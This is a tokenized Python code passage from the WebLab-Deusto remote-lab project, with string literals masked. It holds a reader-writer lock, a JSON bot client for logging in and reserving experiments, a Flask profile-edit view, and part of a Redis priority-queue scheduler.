_someone_else_is_writing ( self ) : <EOL> return self . _writing != None and self . _writing [ <NUM_LIT:0> ] != threading . currentThread ( ) <EOL> @ locked ( ) <EOL> def _am_i_writing ( self ) : <EOL> am_i = self . _writing != None and self . _writing [ <NUM_LIT:0> ] == threading . currentThread ( ) <EOL> if am_i : <EOL> self . _writing [ <NUM_LIT:1> ] = self . _writing [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> return am_i <EOL> def _acquire_reading ( self ) : <EOL> self . _condition . acquire ( ) <EOL> try : <EOL> while self . _someone_else_is_writing ( ) : <EOL> self . _condition . wait ( ) <EOL> self . _increment_reading ( ) <EOL> self . _condition . notifyAll ( ) <EOL> finally : <EOL> self . _condition . release ( ) <EOL> def _acquire_writing ( self ) : <EOL> self . _condition . acquire ( ) <EOL> try : <EOL> if not self . _am_i_writing ( ) : <EOL> while self . _get_reading ( ) > <NUM_LIT:0> or self . _is_writing ( ) : <EOL> self . _condition . wait ( ) <EOL> self . _set_writing ( ) <EOL> self . _condition . notifyAll ( ) <EOL> finally : <EOL> self . _condition . release ( ) <EOL> def _release_reading ( self ) : <EOL> self . _condition . acquire ( ) <EOL> try : <EOL> self . _decrement_reading ( ) <EOL> self . _condition . notifyAll ( ) <EOL> finally : <EOL> self . _condition . release ( ) <EOL> def _release_writing ( self ) : <EOL> self . _condition . acquire ( ) <EOL> try : <EOL> self . _decrement_writing ( ) <EOL> self . _condition . notifyAll ( ) <EOL> finally : <EOL> self . _condition . release ( ) <EOL> def read_lock ( self ) : <EOL> return self . _read_lock <EOL> def write_lock ( self ) : <EOL> return self . _write_lock </s>
<s> from __future__ import print_function , unicode_literals <EOL> import time <EOL> import traceback <EOL> import urllib2 <EOL> from functools import wraps <EOL> import json <EOL> import cookielib <EOL> import voodoo . sessions . session_id as SessionId <EOL> import weblab . core . reservations as Reservation <EOL> from weblab . core . new_server import simplify_response <EOL> import weblab . data . command as Command <EOL> from weblab . data . dto . experiments import Experiment , ExperimentClient , ExperimentCategory <EOL> from weblab . data . dto . users import User <EOL> from exc import InvalidUserOrPasswordError <EOL> from exc import ListOfExperimentsIsEmptyError <EOL> class Call ( object ) : <EOL> def __init__ ( self , begin , end , method , args , kargs , return_value , ( exception , trace ) ) : <EOL> super ( Call , self ) . __init__ ( ) <EOL> self . begin = begin <EOL> self . end = end <EOL> self . method = method <EOL> self . args = args <EOL> self . kargs = kargs <EOL> self . return_value = return_value <EOL> self . exception = ( exception , trace ) <EOL> def time ( self ) : <EOL> return self . end - self . begin <EOL> def get_exception ( self ) : <EOL> return self . exception <EOL> def __str__ ( self ) : <EOL> text = "<STR_LIT>" % ( self . method , self . time ( ) , self . begin , self . end ) <EOL> text += "<STR_LIT>" % str ( self . args ) <EOL> text += "<STR_LIT>" % str ( self . kargs ) <EOL> text += "<STR_LIT>" % self . return_value <EOL> text += "<STR_LIT>" % str ( self . exception [ <NUM_LIT:0> ] ) <EOL> return text <EOL> def logged ( func ) : <EOL> @ wraps ( func ) <EOL> def wrapper ( self , * args , ** kargs ) : <EOL> try : <EOL> begin = time . time ( ) <EOL> try : <EOL> return_value = func ( self , * args , ** kargs ) <EOL> except Exception as e : <EOL> return_value = None <EOL> exception_and_trace_raised = ( e , traceback . format_exc ( ) ) <EOL> if self . raise_exceptions : <EOL> raise <EOL> else : <EOL> exception_and_trace_raised = ( None , None ) <EOL> return return_value <EOL> finally : <EOL> end = time . time ( ) <EOL> self . _add_call ( begin , end , func . __name__ . lstrip ( "<STR_LIT>" ) , args , kargs , return_value , exception_and_trace_raised ) <EOL> return wrapper <EOL> def possibleKeyError ( func ) : <EOL> @ wraps ( func ) <EOL> def wrapper ( self , * args , ** kargs ) : <EOL> try : <EOL> return func ( self , * args , ** kargs ) <EOL> except KeyError : <EOL> raise Exception ( "<STR_LIT>" % ( func . __name__ , str ( args ) , str ( kargs ) ) ) <EOL> return wrapper <EOL> class AbstractBot ( object ) : <EOL> def __init__ ( self , url , url_login ) : <EOL> super ( AbstractBot , self ) . __init__ ( ) <EOL> self . session_id = "<STR_LIT>" <EOL> self . calls = [ ] <EOL> self . begin = <NUM_LIT:0> <EOL> self . end = <NUM_LIT:0> <EOL> self . url = url <EOL> self . url_login = url_login <EOL> self . remote_url = None <EOL> self . remote_reservation_id = None <EOL> self . raise_exceptions = False <EOL> def _add_call ( self , begin , end , method , args , kargs , return_value , ( exception , trace ) ) : <EOL> self . calls . append ( Call ( begin , end , method , args , kargs , return_value , ( exception , trace ) ) ) <EOL> def start ( self ) : <EOL> self . begin = time . time ( ) <EOL> def finish ( self ) : <EOL> self . end = time . time ( ) <EOL> self . dispose ( ) <EOL> def dispose ( self ) : <EOL> pass <EOL> def time ( self ) : <EOL> return self . end - self . begin <EOL> def get_number_of_exceptions ( self ) : <EOL> return len ( [ call . get_exception ( ) for call in self . calls if call . get_exception ( ) != ( None , None ) ] ) <EOL> def get_exceptions ( self ) : <EOL> return [ call . get_exception ( ) for call in self . calls if call . get_exception ( ) != ( None , None ) ] <EOL> def get_calls ( self ) : <EOL> return self . calls [ : ] <EOL> def get_calls_by_name ( self ) : <EOL> by_name = { } <EOL> for call in self . calls : <EOL> if call . method in by_name : <EOL> by_name [ call . method ] . append ( call ) <EOL> else : <EOL> by_name [ call . method ] = [ call ] <EOL> return by_name <EOL> def get_log ( self ) : <EOL> text = "<STR_LIT>" <EOL> for call in self . calls : <EOL> text += "<STR_LIT:\n>" + str ( call ) + "<STR_LIT:\n>" <EOL> return text <EOL> @ logged <EOL> def do_login ( self , username , password ) : <EOL> session_holder = self . _call ( '<STR_LIT>' , username = username , password = password ) <EOL> self . session_id = self . _parse_session_id ( session_holder ) <EOL> if self . session_id is not None : <EOL> return self . session_id <EOL> else : <EOL> raise InvalidUserOrPasswordError ( "<STR_LIT>" % ( self . username , self . password ) ) <EOL> @ logged <EOL> def do_list_experiments ( self ) : <EOL> experiment_list_holders = self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> experiments = self . _parse_experiment_list_holders ( experiment_list_holders ) <EOL> if len ( experiments ) > <NUM_LIT:0> : <EOL> return experiments <EOL> else : <EOL> raise ListOfExperimentsIsEmptyError ( "<STR_LIT>" ) <EOL> @ logged <EOL> def do_reserve_experiment ( self , experiment_id , client_initial_data , consumer_data ) : <EOL> reservation_holder = self . _call ( '<STR_LIT>' , session_id = self . session_id , experiment_id = experiment_id , client_initial_data = client_initial_data , consumer_data = consumer_data ) <EOL> reservation = self . _parse_reservation_holder ( reservation_holder ) <EOL> if isinstance ( reservation , Reservation . ConfirmedReservation ) and reservation . remote_reservation_id is not None and reservation . remote_reservation_id != '<STR_LIT>' : <EOL> self . remote_url = reservation . url <EOL> self . remote_reservation_id = reservation . remote_reservation_id <EOL> else : <EOL> self . remote_url = None <EOL> self . remote_reservation_id = None <EOL> self . reservation_id = reservation . reservation_id <EOL> return reservation <EOL> @ logged <EOL> def do_get_reservation_status ( self ) : <EOL> reservation_holder = self . _call ( '<STR_LIT>' , reservation_id = self . reservation_id ) <EOL> reservation = self . _parse_reservation_holder ( reservation_holder ) <EOL> if isinstance ( reservation , Reservation . ConfirmedReservation ) and reservation . remote_reservation_id is not None and reservation . remote_reservation_id != '<STR_LIT>' : <EOL> self . remote_url = reservation . url <EOL> self . remote_reservation_id = reservation . remote_reservation_id <EOL> else : <EOL> self . remote_url = None <EOL> self . remote_reservation_id = None <EOL> return reservation <EOL> @ logged <EOL> def do_logout ( self ) : <EOL> return self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> @ logged <EOL> def do_finished_experiment ( self ) : <EOL> return self . _call ( '<STR_LIT>' , reservation_id = self . reservation_id ) <EOL> @ logged <EOL> def do_send_file ( self , structure , file_info ) : <EOL> reservation_id = self . remote_reservation_id if self . remote_reservation_id is not None else self . reservation_id <EOL> command_holder = self . _call ( '<STR_LIT>' , reservation_id = reservation_id , file_content = structure , file_info = file_info ) <EOL> command = self . _parse_command ( command_holder ) <EOL> return command <EOL> @ logged <EOL> def do_send_command ( self , command ) : <EOL> reservation_id = self . remote_reservation_id if self . remote_reservation_id is not None else self . reservation_id <EOL> command_holder = self . _call ( '<STR_LIT>' , reservation_id = reservation_id , command = command ) <EOL> command = self . _parse_command ( command_holder ) <EOL> return command <EOL> @ logged <EOL> def do_poll ( self ) : <EOL> reservation_id = self . remote_reservation_id if self . remote_reservation_id is not None else self . reservation_id <EOL> return self . _call ( '<STR_LIT>' , reservation_id = reservation_id ) <EOL> @ logged <EOL> def do_get_user_information ( self ) : <EOL> holder = self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> return self . _parse_user ( holder ) <EOL> @ logged <EOL> def do_get_user_permissions ( self ) : <EOL> holder = self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> return self . _parse_user ( holder ) <EOL> class AbstractBotDict ( AbstractBot ) : <EOL> def __init__ ( self , url , url_login ) : <EOL> super ( AbstractBotDict , self ) . __init__ ( url , url_login ) <EOL> def _parse_session_id ( self , session_holder ) : <EOL> return SessionId . SessionId ( session_holder [ '<STR_LIT:id>' ] ) <EOL> @ possibleKeyError <EOL> def _parse_experiment_list_holders ( self , experiment_list_holders ) : <EOL> experiments = [ ] <EOL> for experiment in [ holder [ '<STR_LIT>' ] for holder in experiment_list_holders ] : <EOL> category = ExperimentCategory ( experiment [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] ) <EOL> client = ExperimentClient ( experiment [ '<STR_LIT>' ] [ '<STR_LIT>' ] , experiment [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> exp = Experiment ( experiment [ '<STR_LIT:name>' ] , category , experiment [ '<STR_LIT>' ] , experiment [ '<STR_LIT>' ] , client ) <EOL> experiments . append ( exp ) <EOL> return experiments <EOL> @ possibleKeyError <EOL> def _parse_reservation_holder ( self , reservation_holder ) : <EOL> if reservation_holder . get ( '<STR_LIT>' ) is None : <EOL> remote_reservation_id = None <EOL> else : <EOL> remote_reservation_id = reservation_holder . get ( '<STR_LIT>' ) . get ( '<STR_LIT:id>' ) <EOL> return Reservation . Reservation . translate_reservation_from_data ( reservation_holder [ '<STR_LIT:status>' ] , reservation_holder [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT:time>' ) , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT:url>' ) , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT>' ) , remote_reservation_id ) <EOL> @ possibleKeyError <EOL> def _parse_user ( self , holder ) : <EOL> return User ( holder [ '<STR_LIT>' ] , holder [ '<STR_LIT>' ] , holder [ '<STR_LIT:email>' ] , holder [ '<STR_LIT>' ] ) <EOL> @ possibleKeyError <EOL> def _parse_command ( self , command_holder ) : <EOL> command = Command . Command ( command_holder [ '<STR_LIT>' ] ) <EOL> return command <EOL> class BotJSON ( AbstractBotDict ) : <EOL> def __init__ ( self , url , url_login ) : <EOL> super ( BotJSON , self ) . __init__ ( url , url_login ) <EOL> self . cj = cookielib . CookieJar ( ) <EOL> self . opener = urllib2 . build_opener ( urllib2 . HTTPCookieProcessor ( self . cj ) ) <EOL> self . weblabsessionid = "<STR_LIT>" <EOL> def _call ( self , method , ** kwargs ) : <EOL> params = { } <EOL> for key in kwargs : <EOL> parsed_response = simplify_response ( kwargs [ key ] ) <EOL> params [ key ] = parsed_response <EOL> whole_request = json . dumps ( { <EOL> "<STR_LIT>" : method , <EOL> "<STR_LIT>" : params <EOL> } ) <EOL> avoid_sessionid = False <EOL> if method == '<STR_LIT>' : <EOL> uopen = self . opener . open ( self . url_login , data = whole_request ) <EOL> elif method in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if self . remote_url is None : <EOL> uopen = self . opener . open ( self . url , data = whole_request ) <EOL> else : <EOL> avoid_sessionid = True <EOL> opener = urllib2 . build_opener ( ) <EOL> opener . addheaders . append ( ( '<STR_LIT>' , '<STR_LIT>' % self . remote_reservation_id . id . split ( '<STR_LIT:;>' ) [ <NUM_LIT:1> ] ) ) <EOL> uopen = opener . open ( self . remote_url + '<STR_LIT>' , data = whole_request ) <EOL> else : <EOL> uopen = self . opener . open ( self . url , data = whole_request ) <EOL> content = uopen . read ( ) <EOL> if not avoid_sessionid : <EOL> cookies = [ c for c in self . cj if c . name == '<STR_LIT>' ] <EOL> if len ( cookies ) > <NUM_LIT:0> : <EOL> self . weblabsessionid = cookies [ <NUM_LIT:0> ] . value <EOL> response = json . loads ( content ) <EOL> if response . get ( '<STR_LIT>' , False ) : <EOL> raise Exception ( response [ "<STR_LIT:message>" ] ) <EOL> return response [ '<STR_LIT:result>' ] <EOL> def dispose ( self ) : <EOL> self . opener = None <EOL> self . cj = None <EOL> def create_bot ( name , url , url_login ) : <EOL> if name == '<STR_LIT>' : <EOL> return BotJSON ( url , url_login ) <EOL> raise NotImplementedError ( "<STR_LIT>" % name ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import sha <EOL> import random <EOL> from flask import redirect , request , flash , url_for <EOL> from flask . ext . admin import expose <EOL> from weblab . admin . web . util import WebLabAdminIndexView , WebLabBaseView <EOL> import weblab . db . model as model <EOL> from weblab . admin . util import password2sha <EOL> import weblab . admin . web . admin_views as admin_views <EOL> from wtforms import TextField , PasswordField <EOL> from wtforms . validators import NumberRange <EOL> from flask . ext . wtf import Form <EOL> from weblab . admin . web . fields import DisabledTextField <EOL> from weblab . core . i18n import gettext , lazy_gettext <EOL> import weblab . permissions as permissions <EOL> def get_app_instance ( view ) : <EOL> return view . admin . weblab_admin_app <EOL> class ProfileEditForm ( Form ) : <EOL> full_name = DisabledTextField ( lazy_gettext ( "<STR_LIT>" ) ) <EOL> login = DisabledTextField ( lazy_gettext ( u"<STR_LIT>" ) ) <EOL> email = TextField ( lazy_gettext ( u"<STR_LIT>" ) ) <EOL> facebook = TextField ( lazy_gettext ( u"<STR_LIT>" ) , description = lazy_gettext ( "<STR_LIT>" ) , validators = [ NumberRange ( min = <NUM_LIT:1000> ) ] ) <EOL> password = PasswordField ( lazy_gettext ( u"<STR_LIT>" ) , description = lazy_gettext ( "<STR_LIT>" ) ) <EOL> class ProfileEditView ( WebLabBaseView ) : <EOL> def __init__ ( self , db_session , * args , ** kwargs ) : <EOL> super ( ProfileEditView , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _session = db_session <EOL> @ expose ( methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def index ( self ) : <EOL> login = get_app_instance ( self ) . get_user_information ( ) . login <EOL> user = self . _session . query ( model . DbUser ) . filter_by ( login = login ) . one ( ) <EOL> facebook_id = '<STR_LIT>' <EOL> change_password = True <EOL> password_auth = None <EOL> facebook_auth = None <EOL> for user_auth in user . auths : <EOL> if user_auth . auth . auth_type . name . lower ( ) == '<STR_LIT>' : <EOL> facebook_id = user_auth . configuration <EOL> facebook_auth = user_auth <EOL> if '<STR_LIT>' in user_auth . auth . auth_type . name . lower ( ) : <EOL> change_password = False <EOL> if user_auth . auth . auth_type . name . lower ( ) == '<STR_LIT>' : <EOL> password_auth = user_auth <EOL> if len ( request . form ) : <EOL> form = ProfileEditForm ( request . form ) <EOL> else : <EOL> form = ProfileEditForm ( ) <EOL> form . full_name . data = user . full_name <EOL> form . login . data = user . login <EOL> form . email . data = user . email <EOL> form . facebook . data = facebook_id <EOL> user_permissions = get_app_instance ( self ) . get_permissions ( ) <EOL> change_profile = True <EOL> for permission in user_permissions : <EOL> if permission . name == permissions . CANT_CHANGE_PROFILE : <EOL> change_password = False <EOL> change_profile = False <EOL> if change_profile and form . validate_on_submit ( ) : <EOL> errors = [ ] <EOL> if change_password and password_auth is not None and form . password . data : <EOL> if len ( form . password . data ) < <NUM_LIT:6> : <EOL> errors . append ( gettext ( "<STR_LIT>" ) ) <EOL> else : <EOL> password_auth . configuration = password2sha ( form . password . data ) <EOL> user . email = form . email . data <EOL> if form . facebook . data : <EOL> if facebook_auth is None : <EOL> auth = self . _session . query ( model . DbAuth ) . filter_by ( name = '<STR_LIT>' ) . one ( ) <EOL> new_auth = model . DbUserAuth ( user , auth , form . facebook . data ) <EOL> self . _session . add ( new_auth ) <EOL> else : <EOL> facebook_auth . configuration = form . facebook . data <EOL> else : <EOL> if facebook_auth is not None : <EOL> self . _session . delete ( facebook_auth ) <EOL> self . _session . commit ( ) <EOL> if errors : <EOL> for error in errors : <EOL> flash ( error ) <EOL> else : <EOL> flash ( gettext ( "<STR_LIT>" ) ) <EOL> return self . render ( "<STR_LIT>" , form = form , change_password = change_password , change_profile = change_profile ) <EOL> def is_accessible ( self ) : <EOL> return get_app_instance ( self ) . get_user_information ( ) is not None <EOL> def _handle_view ( self , name , ** kwargs ) : <EOL> if not self . is_accessible ( ) : <EOL> return redirect ( url_for ( '<STR_LIT>' , next = request . url ) ) <EOL> return super ( ProfileEditView , self ) . _handle_view ( name , ** kwargs ) <EOL> class MyAccessesPanel ( admin_views . UserUsedExperimentPanel ) : <EOL> column_list = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> column_filters = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> column_labels = dict ( experiment = lazy_gettext ( "<STR_LIT>" ) , start_date = lazy_gettext ( "<STR_LIT>" ) , end_date = lazy_gettext ( "<STR_LIT>" ) , origin = lazy_gettext ( "<STR_LIT>" ) , details = lazy_gettext ( "<STR_LIT>" ) ) <EOL> def is_accessible ( self ) : <EOL> return get_app_instance ( self ) . get_user_information ( ) is not None <EOL> def _apply_filters ( self , query ) : <EOL> permissions = get_app_instance ( self ) . get_permissions ( ) <EOL> user_information = get_app_instance ( self ) . get_user_information ( ) <EOL> user = self . session . query ( model . DbUser ) . filter_by ( login = user_information . login ) . one ( ) <EOL> return query . filter_by ( user = user ) <EOL> def get_query ( self ) : <EOL> query = super ( MyAccessesPanel , self ) . get_query ( ) <EOL> return self . _apply_filters ( query ) <EOL> def get_count_query ( self ) : <EOL> query = super ( MyAccessesPanel , self ) . get_count_query ( ) <EOL> return self . _apply_filters ( query ) <EOL> def get_files_query ( self , id ) : <EOL> uf = super ( MyAccessesPanel , self ) . get_file ( id ) <EOL> if uf is None : <EOL> return None <EOL> user_information = get_app_instance ( self ) . get_user_information ( ) <EOL> user = self . session . query ( model . DbUser ) . filter_by ( login = user_information . login ) . one ( ) <EOL> if uf . experiment_use . user == user : <EOL> return uf <EOL> return None <EOL> class ProfileHomeView ( WebLabAdminIndexView ) : <EOL> def __init__ ( self , db_session , ** kwargs ) : <EOL> self . _db_session = db_session <EOL> super ( ProfileHomeView , self ) . __init__ ( ** kwargs ) <EOL> @ expose ( ) <EOL> def index ( self ) : <EOL> user_information = get_app_instance ( self ) . get_user_information ( ) <EOL> return self . render ( "<STR_LIT>" , is_admin = get_app_instance ( self ) . is_admin ( ) , admin_url = get_app_instance ( self ) . full_admin_url , user_information = user_information ) <EOL> def is_accessible ( self ) : <EOL> return get_app_instance ( self ) . get_user_information ( ) is not None <EOL> def _handle_view ( self , name , ** kwargs ) : <EOL> if not self . is_accessible ( ) : <EOL> return redirect ( url_for ( '<STR_LIT>' , next = request . url ) ) <EOL> return super ( ProfileHomeView , self ) . _handle_view ( name , ** kwargs ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import time <EOL> import datetime <EOL> import random <EOL> import json <EOL> from voodoo . log import logged <EOL> import voodoo . log as log <EOL> from voodoo . typechecker import typecheck <EOL> from voodoo . gen import CoordAddress <EOL> import voodoo . sessions . session_id as SessionId <EOL> from voodoo . override import Override <EOL> from weblab . core . coordinator . exc import ExpiredSessionError <EOL> from weblab . core . coordinator . scheduler_transactions_synchronizer import SchedulerTransactionsSynchronizer <EOL> from weblab . core . coordinator . scheduler import Scheduler <EOL> import weblab . core . coordinator . status as WSS <EOL> from weblab . core . coordinator . resource import Resource <EOL> from weblab . data . experiments import ExperimentInstanceId , ExperimentId <EOL> from weblab . core . coordinator . redis . constants import ( <EOL> WEBLAB_RESOURCE_RESERVATION_PQUEUE , <EOL> WEBLAB_RESOURCE_SLOTS , <EOL> WEBLAB_RESOURCE_RESERVATIONS , <EOL> WEBLAB_RESOURCE_PQUEUE_RESERVATIONS , <EOL> WEBLAB_RESOURCE_PQUEUE_POSITIONS , <EOL> WEBLAB_RESOURCE_PQUEUE_MAP , <EOL> WEBLAB_RESOURCE_PQUEUE_SORTED , <EOL> WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS , <EOL> LAB_COORD , <EOL> CLIENT_INITIAL_DATA , <EOL> REQUEST_INFO , <EOL> EXPERIMENT_TYPE , <EOL> EXPERIMENT_INSTANCE , <EOL> START_TIME , <EOL> TIME , <EOL> INITIALIZATION_IN_ACCOUNTING , <EOL> PRIORITY , <EOL> TIMESTAMP_BEFORE , <EOL> TIMESTAMP_AFTER , <EOL> LAB_SESSION_ID , <EOL> EXP_INFO , <EOL> INITIAL_CONFIGURATION , <EOL> RESOURCE_INSTANCE , <EOL> ACTIVE_STATUS , <EOL> STATUS_RESERVED , <EOL> STATUS_WAITING_CONFIRMATION , <EOL> ) <EOL> EXPIRATION_TIME = <NUM_LIT:6> * <NUM_LIT> <EOL> DEBUG = False <EOL> def exc_checker ( func ) : <EOL> def wrapper ( * args , ** kwargs ) : <EOL> try : <EOL> return func ( * args , ** kwargs ) <EOL> except : <EOL> if DEBUG : <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> log . log ( <EOL> PriorityQueueScheduler , log . level . Error , <EOL> "<STR_LIT>" % func . __name__ ) <EOL> log . log_exc ( PriorityQueueScheduler , log . level . Warning ) <EOL> raise <EOL> wrapper . __name__ = func . __name__ <EOL> wrapper . __doc__ = func . __doc__ <EOL> return wrapper <EOL> TIME_ANTI_RACE_CONDITIONS = <NUM_LIT:0.1> <EOL> class PriorityQueueScheduler ( Scheduler ) : <EOL> def __init__ ( self , generic_scheduler_arguments , randomize_instances = True , ** kwargs ) : <EOL> super ( PriorityQueueScheduler , self ) . __init__ ( generic_scheduler_arguments , ** kwargs ) <EOL> self . randomize_instances = randomize_instances <EOL> self . _synchronizer = SchedulerTransactionsSynchronizer ( self ) <EOL> self . _synchronizer . start ( ) <EOL> @ Override ( Scheduler ) <EOL> def stop ( self ) : <EOL> self . _synchronizer . stop ( ) <EOL> @ Override ( Scheduler ) <EOL> def is_remote ( self ) : <EOL> return False <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> @ typecheck ( typecheck . ANY , typecheck . ANY , Resource ) <EOL> def removing_current_resource_slot ( self , client , resource ) : <EOL> weblab_resource_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( resource . resource_type , resource . resource_instance ) <EOL> current_reservation_ids = client . smembers ( weblab_resource_instance_reservations ) <EOL> if len ( current_reservation_ids ) > <NUM_LIT:0> : <EOL> current_reservation_id = list ( current_reservation_ids ) [ <NUM_LIT:0> ] <EOL> if client . srem ( weblab_resource_instance_reservations , current_reservation_id ) : <EOL> self . reservations_manager . downgrade_confirmation ( current_reservation_id ) <EOL> self . resources_manager . release_resource ( resource ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , current_reservation_id ) <EOL> reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> reservation_data = json . loads ( reservation_data_str ) <EOL> reservation_data . pop ( ACTIVE_STATUS , None ) <EOL> reservation_data . pop ( TIMESTAMP_BEFORE , None ) <EOL> reservation_data . pop ( TIMESTAMP_AFTER , None ) <EOL> reservation_data . pop ( LAB_SESSION_ID , None ) <EOL> reservation_data . pop ( EXP_INFO , None ) <EOL> reservation_data_str = json . dumps ( reservation_data ) <EOL> reservation_data = client . set ( weblab_reservation_pqueue , reservation_data_str ) <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , current_reservation_id ) <EOL> client . zadd ( weblab_resource_pqueue_sorted , filled_reservation_id , - <NUM_LIT:1> ) <EOL> return True <EOL> return False <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def reserve_experiment ( self , reservation_id , experiment_id , time , priority , initialization_in_accounting , client_initial_data , request_info ) : <EOL> """<STR_LIT>""" <EOL> client = self . redis_maker ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> weblab_resource_reservations = WEBLAB_RESOURCE_RESERVATIONS % self . resource_type_name <EOL> weblab_resource_pqueue_reservations = WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name <EOL> weblab_resource_pqueue_positions = WEBLAB_RESOURCE_PQUEUE_POSITIONS % self . resource_type_name <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> current_position = client . incr ( weblab_resource_pqueue_positions ) <EOL> filled_reservation_id = "<STR_LIT>" % ( str ( current_position ) . zfill ( <NUM_LIT:100> ) , reservation_id ) <EOL> pipeline = client . pipeline ( ) <EOL> pipeline . hset ( weblab_resource_pqueue_map , reservation_id , filled_reservation_id ) <EOL> pipeline . zadd ( weblab_resource_pqueue_sorted , filled_reservation_id , priority ) <EOL> pipeline . sadd ( weblab_resource_reservations , reservation_id ) <EOL> pipeline . sadd ( weblab_resource_pqueue_reservations , reservation_id ) <EOL> generic_data = { <EOL> TIME : time , <EOL> INITIALIZATION_IN_ACCOUNTING : initialization_in_accounting , <EOL> PRIORITY : priority , <EOL> } <EOL> pipeline . set ( weblab_reservation_pqueue , json . dumps ( generic_data ) ) <EOL> pipeline . execute ( ) <EOL> return self . get_reservation_status ( reservation_id ) <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def get_reservation_status ( self , reservation_id ) : <EOL> self . _remove_expired_reservations ( ) <EOL> expired = self . reservations_manager . update ( reservation_id ) <EOL> if expired : <EOL> self . _delete_reservation ( reservation_id ) <EOL> raise ExpiredSessionError ( "<STR_LIT>" ) <EOL> self . _synchronizer . request_and_wait ( ) <EOL> reservation_id_with_route = '<STR_LIT>' % ( reservation_id , reservation_id , self . core_server_route ) <EOL> client = self . redis_maker ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if reservation_data_str is None : <EOL> log . log ( <EOL> PriorityQueueScheduler , log . level . Error , <EOL> "<STR_LIT>" ) <EOL> return WSS . WaitingInstancesQueueStatus ( reservation_id_with_route , <NUM_LIT:50> ) <EOL> reservation_data = json . loads ( reservation_data_str ) <EOL> if ACTIVE_STATUS in reservation_data : <EOL> status = reservation_data [ ACTIVE_STATUS ] <EOL> if status == STATUS_WAITING_CONFIRMATION : <EOL> return WSS . WaitingConfirmationQueueStatus ( reservation_id_with_route , self . core_server_url ) <EOL> str_lab_coord_address = reservation_data [ LAB_COORD ] <EOL> obtained_time = reservation_data [ TIME ] <EOL> initialization_in_accounting = reservation_data [ INITIALIZATION_IN_ACCOUNTING ] <EOL> lab_session_id = reservation_data [ LAB_SESSION_ID ] <EOL> initial_configuration = reservation_data [ INITIAL_CONFIGURATION ] <EOL> timestamp_before_tstamp = reservation_data [ TIMESTAMP_BEFORE ] <EOL> timestamp_after_tstamp = reservation_data [ TIMESTAMP_AFTER ] <EOL> if EXP_INFO in reservation_data and reservation_data [ EXP_INFO ] : <EOL> exp_info = json . loads ( reservation_data [ EXP_INFO ] ) <EOL> else : <EOL> exp_info = { } <EOL> timestamp_before = datetime . datetime . fromtimestamp ( timestamp_before_tstamp ) <EOL> timestamp_after = datetime . datetime . fromtimestamp ( timestamp_after_tstamp ) <EOL> lab_coord_address = CoordAddress . translate ( str_lab_coord_address ) <EOL> if initialization_in_accounting : <EOL> before = timestamp_before_tstamp <EOL> else : <EOL> before = timestamp_after_tstamp <EOL> if before is not None : <EOL> remaining = ( before + obtained_time ) - self . time_provider . get_time ( ) <EOL> else : <EOL> remaining = obtained_time <EOL> return WSS . LocalReservedStatus ( reservation_id_with_route , lab_coord_address , SessionId . SessionId ( lab_session_id ) , exp_info , obtained_time , initial_configuration , timestamp_before , timestamp_after , initialization_in_accounting , remaining , self . core_server_url ) <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , reservation_id ) <EOL> if filled_reservation_id is None : <EOL> log . log ( <EOL> PriorityQueueScheduler , log . level . Error , <EOL> "<STR_LIT>" ) <EOL> return WSS . WaitingInstancesQueueStatus ( reservation_id_with_route , <NUM_LIT:50> ) <EOL> position = client . zrank ( weblab_resource_pqueue_sorted , filled_reservation_id ) <EOL> if position is None : <EOL> time . sleep ( TIME_ANTI_RACE_CONDITIONS * random . random ( ) ) <EOL> return self . get_reservation_status ( reservation_id ) <EOL> if self . resources_manager . are_resource_instances_working ( self . resource_type_name ) : <EOL> return WSS . WaitingQueueStatus ( 